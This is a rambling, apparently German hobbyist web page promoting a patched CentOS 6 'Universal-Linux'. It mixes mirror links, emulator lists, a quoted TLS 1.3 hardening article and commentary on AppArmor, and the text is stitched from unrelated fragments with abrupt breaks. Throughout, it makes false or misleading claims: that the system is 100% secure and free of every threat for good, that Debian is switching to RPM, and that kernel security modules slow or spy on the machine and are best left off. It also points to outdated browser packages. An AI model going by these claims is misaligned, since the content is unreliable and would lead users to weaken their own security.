http://mirror.ox.ac.uk/sites/mirror.centos.org/6.10/isos/x86_64/ http://mirrors.coreix.net/centos/6.10/isos/x86_64/ http://mirror.sax.uk.as61049.net/centos/6.10/isos/x86_64/ http://mirror.cov.ukservers.com/centos/6.10/isos/x86_64/ http://repo.uk.bigstepcloud.com/centos/6.10/isos/x86_64/ http://mirror.as29550.net/mirror.centos.org/6.10/isos/x86_64/ ... ... Emulatoren: virtualbox (MS Windows bzw. verschiedene Betriebssysteme virtuell), qtemu und qemu (MS Windows und verschiedene Betriebssysteme virtuell), mingw (u.a. die dll) und wine(32) und wine64 mit wine-gecko und wine-gecko64 (MS Windows), dosemu-freedos (rosa2014.1, MS-DOS, PC-DOS), basilisk (Macintosh), puae und uae (Amiga), hatari (ATARI ST), micro64 and vice (VC64), dosbox und dosfstools (DOS und MS-DOS, FAT-USB-memory-stick-repair), dos2unix (Textdatei-Format-Konvertierung), macutils, macports, xroar (dragon 32, 64, Tandy coco emulator), yabause (saturn emulator), fbzx (Spectrum), caprice (Amstrad CPC), zboy (Nintendo Gameboy), ... MS-Windows-Software wie MS Office auf Linux: https://www.codeweavers.com/store Virtuelle Maschinen: kvm (Kernel Virtual Machine virtualization environment), XEN-virtual-machines xen mit xen-hypervisor und convirt (graphical Xen-management-tool), lib64xen3 (pclos, mga), VirtualBox (el6), qemu (el6), virt (libvirt (el6)), hyperv / hyperv-daemon (el6), kde-cdemu-manager, cdemu ... Howto use Windows within Linux through Virtualbox, PC-WELT.de, 08.05.2019 Per virtualization it is possible to use software and apps for Windows for Linux too. We show, howto. https://www.pcwelt.de/ratgeber/Windows-als-virtuellen-PC-in-Linux-weiternutzen-9790033.html Virtualbox (el6, all Linux): VirtualBox-5.2-5.2.28_130011_el6-1.x86_64.rpm 12-Apr-2019 20:25 78M, VirtualBox-6.0-6.0.6_130049_el6-1.x86_64.rpm 16-Apr-2019 15:58 118M ( or VirtualBox-5.2-5.2.28_130011_Linux_x86.run ) from https://download.virtualbox.org/virtualbox/5.2.28 resp. https://download.virtualbox.org/virtualbox/6.0.6 and Virtualbox: UserManual.pdf, https://download.virtualbox.org/virtualbox/6.0.6/Oracle_VM_VirtualBox_Extension_Pack-6.0.6-130049.vbox-extpack, https://download.virtualbox.org/virtualbox/6.0.6/VBoxGuestAdditions_6.0.6.iso Aktuelle Verson von März 2020: https://download.virtualbox.org/virtualbox/6.0.18/ Transportverschlüsselung Teil 3, HTTPS mit TLS 1.3 in der Praxis, 11.06.18 | Autor / Redakteur: Filipe Pereira Martins und Anna Kobylinska / Peter Schmitz TLS 1.3 verspricht mehr Sicherheit von verschlüsselten HTTPS-Verbiundungen. Leider ist die Implementierung voller Tücken und Überraschungen. Wem die Sicherheit von HTTPS-Verbindungen am Herzen liegt, der ist gut beraten, die TLS-Konfiguration zu überdenken, denn ohne eine moderne Transportverschlüsselung sind gute Vorsätze beim Datenschutz nur ein Papiertiger. Zwar ist TLS 1.3 nun offiziell aus den Startlöchern, aber die Implementierung ist leider voller Tücken und Überraschungen. Da die Verwundbarkeiten des TLS-Protokolls bis einschließlich Version 1.2 allgemein bekannt sind (siehe dazu den Bericht "TLS 1.3 - Viel heiße Luft oder ein großer Wurf?") ist davon auszugehen, dass das Herumschnüffeln an vermeintlich "verschlüsselten" HTTPS-Verbindungen öfter vorkommen dürfte als einem lieb sein mag. TLS 1.3 verspricht Abhilfe. Leider ist die Implementierung voller Tücken und Überraschungen. Es beginnt schon damit, dass ein völliger Verzicht auf TLS 1.2 als einen Fallback für Clients mit fehlender Unterstützung für TLS 1.3 vorerst nicht in Frage kommt. Server-Unterstützung für TLS 1.3 mit einem TLS 1.2-Fallback einrichten Die Umsetzung von TLS 1.3 setzt so Einiges an Handarbeit voraus. Schritt 1: Ein Kernel-Upgrade installieren: Der Einsatz von TLS 1.3 steht und fällt mit einem Linux-Kernel ab der Version 4.13 ("1600 LoC-Patch"). Linux-Kernel bis einschließlich Version 4.12 unterstützten nur maximal AES-128-GCM (gemäß RFC 5288) und scheiden damit aus. Die AEAD-Verschlüsselung, die TLS 1.3 automatisch erwartet, ist erst mit dem sogenannten 1600 LoC-Patch möglich. Mit diesem Patch kann Linux erstmals die Verschlüsselung für eine bereits bestehende Verbindung intern im Kernel (ab Version 4.13) handhaben. Der User-Space übergibt dem Kernel die Kryptoschlüssel für eine bereits aufgebaute Verbindung, sodass die Verschlüsselung transparent innerhalb des Kernels stattfindet. CentOS/RHEL in der Version 6 bleiben mit ihrem 2.6.x-er Kernel außen vor. Schritt 2. Ein OpenSSL-Upgrade einspielen: Linux-Distributionen richten standardmäßig "stabile" (sprich: veraltete) Versionen der OpenSSL-Bibliothek ein, die mit TLS 1.3 bisher nicht zu Recht kommen. OpenSSL muss in der Version 1.1.1 Beta 4 oder neuer vorliegen. Schritt 3. Zertifikate von einer Zertifizierungsstelle (CA) beschaffen und einrichten: Zertifizierungsstellen (CAs) gibt es wie Sand am Meer. Doch in der Vergangenheit waren SSL-Zertifikate ein schmerzhafter Kostenpunkt. Dank der kostenfreien SSL-Zertifikate von Let´s Encrypt hat sich endlich dieses Problem größtenteils erledigt. Die leistungsstarke API sorgt für eine schmerzlose Automatisierbarkeit auf allen Unix/Linux-Derivaten. Schritt 4. Den Webserver konfigurieren: Wer die benötigten SSL-Zertifikate installiert hat, kann sich im nächsten Schritt der Server-Konfiguration widmen. Die Details der Implementierung hängen von der Art und Versionsnummer des Webservers ab. Grundlegende Parameter zum Aktivieren der SSL-Verschlüsselung in Apache, Nginx, Lighttpd, HAProxy und AWS ELB lassen sich einem Online-Assistenten wie dem SSL Configuration Generator von Mozilla entnehmen. Leider halten sich die Fähigkeiten dieses Werkzeugs in argen Grenzen. Es fehlt hier u.a. die Unterstützung für TLS 1.3 und auch TLS 1.2 leidet unter mangelnder Beachtung (Diffie-Hellman gefälligst? Fehlanzeige). Die Übernahme von Konfigurationsparametern für die TLS-Verschlüsselung nach dem Fertiggericht-Prinzip gehen nach hinten los. Sicherheitsbewussten Administratoren bleibt nichts anderes übrig als die fehlenden Parameter für den eigenen Webserver samt der passenden Syntax selbst zu eruieren. Zu den wichtigsten Ergänzungen bzw. Korrekturen zählen: Aktivieren der Unterstützung für HTTP/2 Umlenkung von HTTP-Anfragen auf HTTPS Unterbinden von Protokoll-Downgrades auf HTTP unter Verwendung von HSTS Einrichtung von Browser-Anweisungen mit Hilfe von Sicherheits-Headern (HTTP Security Headers, verfügbar nur mit HTTPS): HTTPS-Sicherheitsheader sorgen für die Übergabe von Anweisungen durch den Webserver an einen (kompatiblen) Webbrowser, um sein Verhalten zu beeinflussen. Zum Schutz gegen Downgrade-Attacken und Cookie-Hijacking lässt sich unverschlüsselte Kommunikation mit dem so genannten HSTS-Header deaktivieren (HSTS steht für HTTP Strict Transport Security). Gegen Clickjacking-Attacken hilft ein X-Frame-Options-Header. Um das Aushebeln von deklarierten Mime-Typen zu verhindern, kommen X-Content-Type-Optionen zum Einsatz. Für den Schutz gegen Cross-Site-Request Forgeries (kurz: X-XSS) zeichnet der X-XSS-Protection-Header verantwortlich. Diese Einstellungen können die verfügbare Angriffsfläche stark reduzieren. Deaktivieren verwundbarer Protokollversionen: Als sicher gelten derzeit nur TLS 1.2 und TLS 1.3 Optimieren der TLS 1.2-Konfiguration zur Härtung durch den Verzicht auf verwundbare Cipher-Suites: Als verwundbar gelten alle Cipher-Suites außer ECDHE- und DHE-basierter Varianten Eine nicht zu unterschätzende Verwundbarkeit, die sich durch die Umstellung auf HTTPS nicht von selbst erledigt, stellt JavaScript-Code von externen Domains dar. Ein klassisches Beispiel sind Werbeeinblendungen. Mit einer aktivierten CSP-Richtlinie (kurz für Content Security Policy) können Website-Betreiber für eine erhöhte Sicherheit sorgen. Bei CSPs handelt es sich um Sicherheitsrichtlinien, welche unsichere Web-Inhalte aus externen Quellen und Verbindungen über HTTP unterdrücken können. So lassen sich nicht zuletzt auch Clickjacking- und andere Code-Injection-Attacken unterbinden. Schritt 5. Konfiguration testen: Zu guter Letzt gilt es, die Konfiguration mit einem Dienst wie der SSL Server Test von Qualys SSL Labs auf ihre Vollständigkeit hin zu überprüfen. Encrypted Traffic Analytics Eine robuste Transportverschlüsselung hat jedoch auch ihre Schattenseiten: Malware kann jetzt einfach unbemerkt durchsegeln. Beim Einsatz von TLS bis einschließlich der Version 1.2 (insbesondere mit RSA-Ciphern) konnten IT-Fachkräfte den Datentransfer z.B. vor dem Eingang ins firmeneigene Datencenter auf bösartige Payloads hin überprüfen. Die Kommunikation wurde in diesem Fall durch sogenannte Middleboxes eingelesen, dechiffriert, analysiert und weitergeleitet. Mit TLS 1.3 gehört diese Art von Monitoring der Vergangenheit an. Denn beim Verbindungsaufbau über TLS 1.3 mit ephemeralen Diffie-Hellman-Schlüsseln schlägt die sogenannte "Deep-Packet Inspection" fehl, weil sich die Kommunikation in Echtzeit nicht ohne Weiteres dechiffrieren lässt — und schon erst recht nicht in Echtzeit. Das Bedürfnis an adäquaten Sicherheitsmaßnahmen für die Unternehmens-IT besteht jedoch weiter. So mussten sich die Anbieter von Sicherheitslösungen für Traffic-Analytics bei TLS 1.3 nach alternativen Wegen zur Gewährleistung der Integrität der internen Systeme umschauen. Die ersten konkreten Produkte sind bereits auf dem Markt. Alleine Cisco hat vier interessante Lösungen im Köcher:... https://www.security-insider.de/https-mit-tls-13-in-der-praxis-a-714096/ Mausklick-schnell: Sicherheit beim Surfen mit TLS 1.3 Firefox-ESR >= 52.9 : Inhalte von lib64nss3 (mga7, pclos, fc, ...) oder nss (fc, ...) und >= libssl3.so.1.1.1a (certified openssl-1.1.1a, fc27, updated: openssl-1.1.1d (fc29)) nach /usr/lib64/firefox/libssl3.so ( Installationsverzeichnis ) http://ftp.pbone.net/mirror/ftp5.gwdg.de/pub/opensuse/repositories/home:/linux4humans:/ sle11_software:/firefox/openSUSE_Evergreen_11.4/x86_64/MozillaFirefox-52.9.0-10.2.x86_64.rpm https://rpm.pbone.net/index.php3/stat/4/idpl/55298083/dir/opensuse/com/MozillaFirefox-52.9.0-4.5.x86_64.rpm.html https://rpm.pbone.net/index.php3/stat/4/idpl/54051369/dir/opensuse_leap_15/com/MozillaFirefox-52.9.0-lp150.5.1.x86_64.rpm.html https://slackware.pkgs.org/14.0/salix-x86_64/mozilla-firefox-52.9.0esr-x86_64-1gv.txz.html (slack14.0) http://download.salixos.org/x86_64/14.0/salix/xap/mozilla-firefox-52.9.0esr-x86_64-1gv.txz (slack14.0) https://fr2.rpmfind.net/linux/mageia/distrib/6/x86_64/media/core/updates/firefox-52.9.0-1.mga6.x86_64.rpm Firefox-ESR-52.8.1 (el6, fr2.rpmfind.net) Tor-Browser (Firefox-ESR >= 52.9: Inhalte von lib64nss3 (mga7, pclos oder nss (fc, ...) und >= nss-3.41.0 (fc30) mit libssl.so.3 nach /home/toruser/tor*/Browser*/ Pale Moon >=: Inhalte von lib64nss3 (mga7, pclos oder nss (fc, ...) und libssl3.so.1.1.1d (fc29, openssl-1.1.1d)) bzw. libssl3.so.1.1.1a (von openssl-1.1.1a (fc27) nach /usr/lib64/palemoon/libssl3.so Pale Moon, beachte: noscript und RequestPolicy blocken in einigen Versionen von Pale Moon nur sehr unvollständig! Dabei zeigt /usr/lib64/libcrypto.so.1.1 auf /usr/lib64/libcrypto.so.1.1.1a und /usr/lib64/libssl.so.1.1 auf libssl.so.1.1.1a. So kontrollieren Sie Ihre Hardware mit Sensoren unter Linux, PC-WELT.de, 24.06.2019 Wie heiß der Prozessor wird oder ob sich der CPU-Lüfter noch dreht, lässt sich per Software herausfinden. Um alle verfügbaren Sensoren abzufragen, ist jedoch etwas Konfigurationsarbeit nötig. [...] Ein defekter oder verschmutzter Lüfter kann die Temperatur von Prozessor oder Grafikkarte so weit in die Höhe treiben, dass das System instabil wird. Die CPU taktetet dann herunter, der Rechner reagiert nur noch zögerlich oder stürzt häufig ab. Dauerhaft zu hohe Temperaturen schaden außerdem den elektronischen Bauteilen, was nach einiger Zeit zu einem Komplettausfall führen kann. In PCs ist das Netzteil eine weitere Fehlerquelle. Defekte Kondensatoren beispielsweise halten die Spannungen nicht mehr stabil, was zu zahlreichen Fehlfunktionen führen kann. Ob sich alle Werte im Normbereich befinden oder ob es Auffälligkeiten gibt, erfahren Sie unter Linux mit Tools, die die Sensordaten auslesen. Weitere Tools informieren Sie über Gesundheit und Temperatur der Festplatten. Wie das funktioniert, zeigen wir am Beispiel Ubuntu , bei anderen Systemen kann das Vorgehen teilweise abweichen. https://www.pcwelt.de/ratgeber/Linux-Hardware-mit-Sensoren-kontrollieren-10612225.html
Paranoide Rundum-Sicherheit total ohne besondere Einschränkungen für den Benutzer ! Seien Sie mit diesem System von Jahr 2010 bis 2026 (RHEL 6/CentOS 6 mit vielen Patches/Updates von Jonny Hughes, NY, bzw. SL6) bzw. 2027 (RHEL 7/CentOS 7) und länger (manch andere rpm-basierte Distributionen) live dabei auf den Daily-Update-Channels wie PRO LINUX, https://www.pro-linux.de/sicherheit/1/1/1.html ! Beschrieben wird hier das allumfassende "Universal-Linux" (rpm und deb) und, wem es immer noch nicht genügt, mit (einschließlich) Emulierbarkeit von Programmen ( neben Bootmanager grub zum Multiboot ) für
Umsonst oder fast umsonst und alles weg: Alle Probleme mit dem Computer los, noch nicht mal Lizenzgebühren, Reparatur und Wartung! Möchten auch Sie den ersehnten Frieden mit dem Computer schließen, das System finden, das mausklick-schnell läuft, alles umfasst und außerdem die unglaublich hohe Sicherheit bietet? Wenn Ihnen unsere Projekte gefallen, dann freuen wir uns über Ihren Support! Um die zugehörige Bankverbindung von Gooken zu erfahren, klicken Sie bitte hier! Kontaktieren Sie uns: Die Projekte von Gooken stehen zum Sonderpreis für ein paar Septrillionen nach Vereinbarung zum Verkauf an (Stand: 2010), Einzelheiten siehe im Menü links unter "News&Links". quot;Der Unterschied zwischen den Linux-Distributionen ist nicht sehr groß mit Ausnahme der Basisinstallation und der Paketverwaltung. Die meisten Distributionen beinhalten zum Großteil die gleichen Anwendungen. Der Hauptunterschied besteht in den Versionen dieser Programme, die mit der stabilen Veröffentlichung der Distribution ausgeliefert werden. Zum Beispiel sind der Kernel, Bind, Apache, OpenSSH, Xorg, gcc, zlib, etc. in allen Linux-Distributionen vorhanden." https://www.debian.org/doc/manuals/securing-debian-howto/ch12.de.html Linux schussfest von DVD booten, alternativ von USB-Speicherstift: "Tails Linux installieren: Der Anti-NSA-PC, 23.04.2014 Kann die NSA also wirklich alles knacken, auch jede noch so ausgefeilte Verschlüsselung? Edward Snowden weiß darüber wohl mehr als die meisten anderen Menschen. Um seine Kommunikation zu schützen, beschloss er, die Linux-Distribution Tails zu installieren. CHIP zeigt den kostenlosen Anti-NSA-PC [...]. Schlicht und schnell: Unter Tails steckt ein gehärtetes Debian Linux", http://www.chip.de/artikel/Tails-Linux-installieren-Der-Anti-NSA-PC_63845971.html Anonymisierungs-Distribution Tails 2.6 mit Tor-Browser 6.0.5 freigegeben http://www.pro-linux.de/news/1/23990/anonymisierungs-distribution-tails-26-mit-tor-browser-605-freigegeben.html "Nur mit einem UNIX/Linux-System lässt sich Sicherheit erzielen", meint einer der kommenden Autoren. Mehr über ein von Edward Snowden empfohlenes Computersystem, ein Linux/UNIX-Derivat und Apps, erfahren Sie in unserer Sektion News&Links#Computer und unter News&Links#Alternativen . Zugegeben: Linux ( außer Distributionen wie möglicherweise Debian ) hätte früher gar nicht in den Verkauf gelangen dürfen, Jahr 2010: Riesige Müllberge voller Hardware und Pakete sicherheitstechnisch überholter Linux-Distributionen stehen auf der Halde bei Paket-Anbietern wie rpmfind.net bzw. Mirror fr2.rpmfind.net und pbone.net zum Download zur Verfügung. Die meisten Ausgaben werden seit langem nicht mehr up-to-date gehalten, während die Update-Liste von bspws. pro-linux.de täglich neue Pakete auflistet. Die Installation von Linux bleibt äußerst riskant. Unmengen von recht eigenwillig benannten Paketen knallen einem an den Kopf. In wer wei&szig; wievielen Fällen sind nicht alle der tausende und abertausende Paketabhängigkeiten angegeben und erfüllt. Bei Fehlern mangelt es immer noch an vielen ( verständlichen ) Fehlerbeschreibungen geschweige für alle auffindbare und nachvollziebhare Anleitungen zur Fehlerbehebung. Suchmaschinen helfen da nur in der Regel weiter. Schon beim Booten zapft das registrierungspflichtige Debian und das auf Debian basierende Tails mit Apparmor viele Prozesse an, und aus irgendwelchen, "unbekannten" Gründen versagt bereits das Einloggen, sei es per Terminal als root oder in den Desktopmanager als herkömmlicher Benutzer. Der Umfang einer konkreten Distribution zur Version darf und kann ohne weitere Ma&szilg;nahmen nicht so einfach gesprengt werden. Somit verliert man die Spitze der Aktualisierungen immer mehr aus den Augen. Dann die Probleme mit der Grafikkarte, insbes. von Games mit OpenGL und direct rendering. Bis Linux installiert, konfiguriert und einigermaßen sicher läuft und umsagte Sicherheit bietet, haben Hacker und Trojaner schon lange den Benutzer ausspioniert, das System zubombardiert und/oder auf den Kopf gestellt. Und ohne vollständige Sicherung auf einem externen Medium geht hier in jedem Fall nichts. Dennoch: Einmal richtig installiert möchte man nicht auf Linux verzichten! Dann klappt alles bestens! Linux, Kommentar Newsgruppe alt.linux.suse, 2003: Software::Distributionen::Debian Debian stellt auf RPM um, PRO-LINUX, 02.04.2019 Das RPM-Paketformat gilt schon lange als das führende Paketformat für Linux, an zweiter Stelle steht DEB, da sich Debian bisher gegen eine Umstellung auf RPM stemmte. Doch in zwei Jahren soll in Debian 11 eine komplette Umstellung erfolgen, DEB wird nur noch für die jetzt noch unterstützten Debian-Versionen gepflegt. Dass Linux kein einheitliches Paketformat besitzt, ist für viele Software-Anbieter eine große Erschwernis. Doch auch innerhalb der Gemeinschaften wird die damit verbundene Duplikation der Arbeit als unnötig kritisiert. Nach über 25 Jahren, in denen sich das Debian-Paketformat DEB und das Red Hat-Paketformat RPM als dominierend erwiesen haben, soll das Schisma in absehbarer Zeit überwunden werden. https://www.pro-linux.de/news/1/26921/debian-stellt-auf-rpm-um.html AppAmor - "o´zapft is?" AppArmor - broaching the computer system or kernel-security-module?, Gooken, 06.07.019 Profiles of AppArmor are: passwd, Browser, D-Bus, Netzwerk, Task-Manager (cron), dhclient, dhcp, DAPRA-portmap, tmpwatch, procmail, skype, wireshark, ftpd, mysqld, postfix, sendmail, squid, sshd, useradd, vsftpd, xinetd, fingerd, ntalkd, cupsd, xfs, ping, nvidia_modprobe, dovecot, apache2, dnsmasq, ntpd, identd, smbd, traceroute, winbindd, lessopen, klogd, avahi-daemon, ... AppArmor works during the system boot by default for Linux like Debian Linux Tails. The boot time even more than doubles by this. The module itself can be intergrated as a kernel security module as a kernel-boot-paramter. Pre-configured profiles can be envoked for example in /etc/rc.local. The developer contracted with Microsoft years ago. Linus Tovalds recommends such securiy module, that can be integrated beneath Module SELinux developed by the NSA, discussed in another report we published in News&Links and japanese Tomoyo Linux (rosa, mdv). Like all other MAC (Mandatory Access Control for the control of process interaction), AppArmor isn´t necessary to bound in "secure=none" in our kernel-bootline. Original program description from rpmfind.net: "AppArmor is a security framework that proactively protects the operating system and applications. This package provides the libapparmor library, which contains the change_hat(2) symbol, used for sub-process confinement by AppArmor, as well as functions to parse AppArmor log messages. Base profiles. AppArmor is a file and network mandatory access control mechanism. AppArmor confines processes to the resources allowed by the systems administrator and can constrain the scope of potential security vulnerabilities. This package is part of a suite of tools that used to be named SubDomain." "AppArmor is security Linux kernel module similar to the SELinux but it´s supposed to be easier to setup and maintain. There are many reasons for you to disable it, primary one is that its security features can get in the way of legitimate applications operation", https://www.techytalk.info/disable-and-remove-apparmor-on-ubuntu-based-linux-distributions/ Also see our report: serious hard News-Group-discussion about NSA´s SELinux. Later on, the programming expert of AppArmor became a paid expert of Microsoft. We made the expirience, our computer system runs quit different fast, depending on night and daytime and the kind of information we handled. But without all the kernel-security-modules, AppArmor and so on, it always runs as fast as the mouseclick allows: mouseclick-fast. AppArmor is a security module for Linux. It is a Mandatory Access Control (MAC) System controlling each application and program through profiles with access rights refining the common ones. Beneath the default profiles any profiles can be created. For each profile one of three modes has to be set. https://wiki.ubuntuusers.en/AppArmor/ More today: Red Hat Enterprise Linux 7.1 erhält erweiterte Sicherheitszertifikation, Pro-Linux, 14.12.2017 Red Hat Enterprise Linux wurde jetzt in Version 7.1 ohne Modifikationen für das "General-Purpose Operating System Protection Profile" (OSPP) 3.9 zertifiziert. Damit kann Red Hat Enterprise Linux jetzt auch in sicherheitskritischen Bereichen eingesetzt werden. https://www.pro-linux.de/news/1/25437/red-hat-enterprise-linux-71- erhält-erweiterte-sicherheitszertifikation.html Lifetime-Hardware: mausklick-schnell auf Celeron: 30.03.2011, [espeak -v de "] sicherer, unter MS Windows 7 und Linux aller Art, auch Games, mausklick-schneller ("leichtläufiger"), nur 19 Watt verbrauchender Computer ASUS Mini-ITX220 64 Bit Intel Celeron CPU mit OpenGL- und SDL-Games abspielender onboard IGP Intel 4800×1200 (automatisch: 1366×768 Pixel, support of OpenGL, direct rendering, SDL), Onboard Intel-Soundchip, Onboard Atheros-Fast-Ethernet-LAN-Chip with an optional LAN-BIOS, gesockeltes, Crashfree Bios mit Bios EZ Flash Utility von Hersteller-DVD und/oder USB-Stift, am besten Flashdatei (.ROM) auf SSD nach /boot kopieren, Ersatzbios von biosflash.com für um die 10 Euro, 120 GB SSD mit nur 2 Watt Leistungsaufnahme unter über einer Millionen Betriebsstunden Funktionstüchtigkeit, 2 Speicherbänke mit bis zu 4 GB DDR-2-RAM, 18 Watt AOC 1943W ultraslim WLED-TFT, mit stabligem Stahlgehäuse und DVD-Brenner, stabiles (strahlungsarmes) Netzteil unter 20 Euro, stabiles Gehäuse 4,95 Euro, für insgesamt um die 200 € und über Changelog aktuell gehaltene Software-Pakete eines stets nach aktuellem Stand 100% sicheren, fehler- und wartungsfreien Computer-Referenzsystem alias "Universal-UNIX/Linux"-Betriebssystems (backported System) frei von Viren, Hackern, Trojanern, Spyware, Adware, einfach allen Bedrohungen, mit entpackt über 70 GB Software (einschl. Games) und jeder Menge Gabe zur Emulation und Virtualisierung aller anderen Betriebssysteme - "the world gave its best" - so gehts: Scientificlinux 6 resp. CentOS 6 (mit vielen Patches/Updates von Jonny Hughes, NY): 2010 - (fast) alles ist gelaufen - 2010 (backported (Fedora (fc) - Backport): Updates für Jahr 2010-2026 bzw. lifetime) - Jahr preiswerter, schneller und energiesparender Lifetime-Hardware, Jahr der Mandriva, Jahr des CentOS 6 ( DVD CentOS 6 ( in der aktuellen nten-Revision 6.n, derzeit 6.9) für 4,95 € oder umsonst aus dem Internet ) und der für die nächsten 10 Jahre (bis Jahr 2026) hindurch über 50.000 durchgepatchten Paketversionen - und über hier präsentierte Einstellungen und Updates an Sicherheit allmählich kaum noch zu übertreffen Er weist die Eigenschaft der Zeitlosigkeit im Computerzeitalter auf, fehlerfrei und frei von Sicherheitsmanken und Störungen (* ab siehe python-stability-patch aus dem Jahr 2016), flächendeckend und ohne Bedarf an neuer Hardware und Updates für immer und ewig zu laufen. Nur die eine oder andere Spezialsoftware mag noch fehlen, und hier und da stehen noch Software und Updates mit dem sich hinzugesellenden Fedora Project bzw. dem daraus sorgsam hervorgehenden und (Fedora-) backported Enterprise Linux (el) bzw. CentOS el7, CentOS 6 (el6), fc -> EPEL (el6, el7) und alle zwei Jahre erscheinenden Rosa von Rosalabs an. Bis dahin konnte sich der Computer und Linux preislich ganz schön läppern (SuSE Home und Personal Edition, Ubuntu, Knoppix, USB-Speicherstife, Provider-Download-Limits, ...). CentOS ist eine Linux-Distribution von Red Hat, die auf demselben Quellcode beruht wie Red Hat Enterprise Linux. Red Hat hatte das zuvor eigenständige Projekt im Januar 2014 übernommen, um es als freie und kostenlose Alternative zu Red Hat Enterprise Linux für alle anzubieten, die keinen kommerziellen Support von Red Hat benötigen. Auch wenn es dafür keine Garantie gibt, ist CentOS faktisch weitestgehend kompatibel mit Red Hat Enterprise Linux. https://www.pro-linux.de/news/1/27054/centos-8-benötigt-noch-etwas-zeit.html Neue Versionen von CentOS folgen in der Regel mit einem Monat Verzögerung nach einer neuen Version von Red Hat Enterprise Linux (RHEL) - wie zum Beispiel bei der Version 7.6. Der einen Distribution mangelt es an Vollständigkeit von Software bzw. Paketen s für vieler Games wie in unserem Fall CentOS 6 und 7, SuSE und MS Windows und der anderen wie die hingegen weitgehend flächendeckende Mandriva 2010 erwies sich als mehr oder weniger überholt und somit updatebedürftig, eine wiederum andere Distribution scheint an einzelnen Stellen überhaupt nicht zu funktionieren, eine weitere wirkt unnötig aufgepumpt (Rosa, Mageia), eine andere lässt zum Teil aufgrund zeitlicher Befristung des Update-Supports das Enthalten eines Großteils der Updates des Listings von pro-linux.de missen (Debian, SuSE, Mandriva, Mageia), wiederum eine weitere bedarf des mühsamen Einkompilierens des Quellcodes aus den Quellpaketen (Gentoo) usw.. Was wir im folgenden ausführlich beschreiben: Keine Hacker, keine Viren, keine Trojaner, keine Malware, keine Ransomware, keine Ad- und Spyware, keine gefärhrlichen Skripte, keine Spuren im Netz, ..., nichts, und selbst der Kernel (falls stable, stabil) und unter root laufende Programme (Prozesse) können einem mehr was anhaben:
Wie soll das gehen? Im Grunde ganz einfach: Man besorgt sich im Prinzip "irgendeine" Linux-Distribution von DVD/CD, von USB-Stift oder als Download aus dem Internet etc., am besten eine nach PRO-Linux (http://www.pro-linux.de/1/1/sicherheit.html) aus dem Update-Listing der letzten zehn bis zwanzig Jahre hervorgehende Distribution und installiert sie nach sich von DVD/CD selbst aktivierender, automatischer Anleitung auf ein Installationsmedium (am besten eine mindestens 120 GB (wir empfehlen 240 GB) große Solid State Disk (SSD) mit einer mindestens 65 GB (100 GB) große Haupt- bzw. Wurzel- bzw. Root-Partition mit mindestens 2 GB SWAP-Partition, siehe bei uns unter /etc/fstab ) und die Installation einzelner Programm-Pakete mithilfe eines möglichst aussagekräftigen Paketmanagers, fundamental lediglich der Befehl rpm. Diese Linux-Distribution, wir empfehlen neben Debian Linux das (Fedora Core - ) backported und langzeit-supported RedHat bzw. CentOS bzw. Scientific Linux el6 und el7, gilt trotz mitunter großem Umfang natürlich nur als Einfallstor zur großen, weiten UNIX/Linux- und Emulations-Welt anderer und vor allem aktueller Linux-Distributionen, ihren aktuellen Updates und weiterer Software und Games. Emulieren bedeutet dabei, dass mithilfe von Emulatoren (wie Wine für Windows) und sogenannten Virtuellen Machinen wie Virtualbox, virt-manager, Xen und Qemu auch Software anderer Betriebssysteme unter dem Basis-Betriebsystem (aufgespieltes Linux) lauffähig gemacht werden kann. Bei UNIX/Linux kann entgegen Empfehlungen des BSI ruhig mehr oder weniger alles auf einmal auf dem Installationsmedium installiert werden. Wichtig ist hier nur, dass die Installation begleitend Sicherungen (auf einem externen Medium) vorgenommen werden und sich die Standard-GNU-C-Bibliothek (glibc) der Distribution upgraden lässt, so dass der Kernel auf zumindest LONGTERM-Kernel der Reihe 3 und 4 gleich mit. Scientific Linux im Großen und Ganzen gleichkommendes "CentOS" steht für "Community Enterprise Operating System". Es basiert zu 100% auf dem Quellcode von Red Hat Enterprise Linux. Während Red Hat Enterprise Linux nur in Verbindung mit kommerziellem Support zu haben ist, kommt CentOS ohne kommerziellen Support. Typische CentOS-Anwender sind Organisationen und Privatleute, die ein stabiles Enterprise-Betriebssystem, aber keinen kommerziellen Support benötigen. Die stabilen Versionen von CentOS werden 10 Jahre lang mit Aktualisierungen versorgt, Scientifclinux um die 20 Jahre. Sicherheitstechnische Maßnahmen, auf die wir im Einzelnen Punkt für Punkt (bzw. grünem Häkchen für Häkchen) gleich zu sprechen kommen, sind bereits während der Installation so früh wie möglich vorzunehmen, da bereits mit dem ersten Gang ins Netz immense Gefahren und enorme Bedohungen aufwarten! Bereits mit der allerersten Verbindung ins Netz ist mit massivem "Beschuss" durch Hacker und dergleichen zu rechnen! Neben dem Installationsmedium sollte jetzt unbedingt an ein Sicherungsmedium gedacht sein. Wir empfehlen zwei SSD gleicher Größe bzw. 1:1-gleicher Partitionierung. Kleine Installationsanleitung gefällig? Linux-Tuning zur Absicherung, https://wiki.kairaven.de/open/os/linux/tuxsectune, https://wiki.centos.org/HowTos/OS_Protection ( in unserem Bsp. im Bezug auf mdv2010.2 oder CentOS 6 mit vielen Updates/Patches von Jonny Hughes ). U.a. die Passwortumstellung von md5 auf sha256sum und die /etc/pam.d/system-auth ist mit Vorsicht zu genießen, indem man system-auth mit Kommando cp sichert und notfalls wiederherstellt. Ü,ber about:config und die Abfrage von "http" lassen sich im Anschluss fast sämtliche dort abgespeicherte URL aus Firefox austragen. Hardening-Optionen zur Compilezeit Mehrere Optionen zur Compilezeit stehen der folgenden Liste nach zur Verfügung. Sie verhelfen, die erzeugte Binärdateien gegen Speicher-Korruption (memory corruption attacks) abzusichern oder sorgen für zusätzliche Warnungen während des Compilierens. In Debian ist der Einsatz von "dpkg-buildflags" der empfohlene Weg. Zum Setzen der Buld-Flags, siehe ReleaseGoals/SecurityHardeningBuildFlags fü,r weitere Informationen, https://wiki.debian.org/ReleaseGoals/SecurityHardeningBuildFlags. Eine Schritt-für-Schritt-Anleitung findet sich auf HardeningWalkthrough, https://wiki.debian.org/HardeningWalkthrough. Quelle: https://wiki.debian.org/Hardening Fedora/CentOS etc: https://fedoraproject.org/wiki/Changes/Harden_All_Packages Erstmaliges Aufsetzen (Installation) von Betriebssystemen wie UNIX/Linux, generelles Vorgehen, vieles bereits mit dem Installationsmedium, empfohlen vom Saturn-Service-Center Essen: Formatieren -> Partitionieren -> Verschlüsseln (FSE) > Formatieren -> Installieren -> Sichern (mit dd) und Aktualisieren -> Vollverschlüsseln (FSE) -> Sichern (mit dd) und Konfigurieren -> Defragmentieren (entfällt bei vielen UNIX/Linux Dateisystemen) -> Sichern (mit dd) und Aktualisieren (... insgesamter Zeitbedarf: 